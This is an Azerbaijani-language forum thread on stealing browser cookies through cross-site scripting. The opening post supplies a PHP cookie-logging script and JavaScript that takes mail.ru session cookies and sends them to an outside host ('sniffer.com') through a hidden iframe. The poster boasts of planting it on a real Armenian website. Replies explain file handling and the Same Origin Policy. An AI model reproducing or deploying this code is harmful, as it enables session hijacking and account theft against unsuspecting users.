orda cookie.php yerine php faylın adını yazacaqsınız.Indi isı php kod
Kod:
<?php
$cookie =$_GET['cookie'];
$date = date ("l ds of F Y h:i:s A");
$ip = $_SERVER['REMOTE_ADDR'];
$file = fopen('log.html', 'a');
fwrite($file,"DATE : $date || IP: $ip || COOKIE : $cookie <br />");
fclose($file);
?>
Bunu istədiyiniz adda adlandırın.Təki xss kodu üçün uyğun olsun Mən cookie.php adlandırmışdım kodlar log.html-ə yazılacaq
Nə isə bu kodun üstünlüyü ondadır ki tələyə salınmış user tələyə salındığını bilmir əgər xss kodunu <script> ilə etseydim browser-də bilinəcəkdi amma burda hər şey iframe-in içində gedir o da gizlədilib
P.S.:Bu kodu construction.am-a atmişam ermeni cookiləri gelecek 100% işləyir mənə aiddir
mail.ru üçün isə bele etmek olar əgər xss varsa onda öz saytıvızda bele bir javascript düzəldirsiz
Kod:
var the_cookie = document.cookie;
var the_cookie = unescape(the_cookie);
var broken_cookie = the_cookie.split("Mpop");
var the_value = broken_cookie["1"];
document.getElementById('TipOfTheDay').innerHTML='<IfRaMe width=0 height=1 src="http://sniffer.com/img.php?'+the_value+'"></IfRaMe>';document.getElementById('TipOfTheDay').style.display='none';
Fayl log.html özü yaranacaq orada fopen-də a moddadır.
a modda da fayl mövcüd deyilsə onu yaratmağa cəhd edir.
+
Bu skriptdəki $cookie sanitizə edilməyib deyə özü avtomatik log.html-də XSS yaradacaq.
Sitat#12996BlackMinD :
Fayl log.html özü yaranacaq orada fopen-də a moddadır.
a modda da fayl mövcüd deyilsə onu yaratmağa cəhd edir.
+
Bu skriptdəki $cookie sanitizə edilməyib deyə özü avtomatik log.html-də XSS yaradacaq.
@TheConficker yəniki İP modemin öz interfeysi üçün yoxsa port 80-da vertrigo üçün?
Modem üçündürsə inanmıramki reallaşsın.
Amma vertrigo üçün o halda həm Apachenin loglarına düşəcək ziyarətçinin İP-Sİ timestampı + Brauzeri+Query stringi (yəni hansisafayl.php?parameter=VALUE) şəklində ($_GET request üçün)
Ammaki Apache-də onu hər hansı php scriptə include edib tutmaq olar sadə şeydir.
Sitat#13064BlackMinD :
@Avatar Dəyməz sən də sağol.
@TheConficker yəniki İP modemin öz interfeysi üçün yoxsa port 80-da vertrigo üçün?
Modem üçündürsə inanmıramki reallaşsın.
Amma vertrigo üçün o halda həm Apachenin loglarına düşəcək ziyarətçinin İP-Sİ timestampı + Brauzeri+Query stringi (yəni hansisafayl.php?parameter=VALUE) şəklində ($_GET request üçün)
Ammaki Apache-də onu hər hansı php scriptə include edib tutmaq olar sadə şeydir.
aha vetigro üçün amma biri var ip dushur isteyirem cookieleri de dushsun ipini tutmaq olur esas qalib cookie
fikrimi düz başa düşdün
kimi girirsə burda sözsüz ki, sən o ziyarətçinin cookiesini (başqa domen) üçün oxuya bilməzsən.(Yalnız öz domenin üçün oxuya bilərsən)
Same Origin Policy (brauzerlərdə realizə edilən bir şeydir) buna imkan vermir.
Yox əgər artıq XSS şəklində məsəl üçün:
Sitat#13154BlackMinD :
@TheConficker yox bro cookieni XSS-siz (2-ci saytın cookiesini)oxumaq mümkün deyil.
Yəni kimsə sənin deyək localhostuna adi qaydada:
kimi girirsə burda sözsüz ki, sən o ziyarətçinin cookiesini (başqa domen) üçün oxuya bilməzsən.(Yalnız öz domenin üçün oxuya bilərsən)
Same Origin Policy (brauzerlərdə realizə edilən bir şeydir) buna imkan vermir.
Yox əgər artıq XSS şəklində məsəl üçün:
100% işləyir mənə aiddir
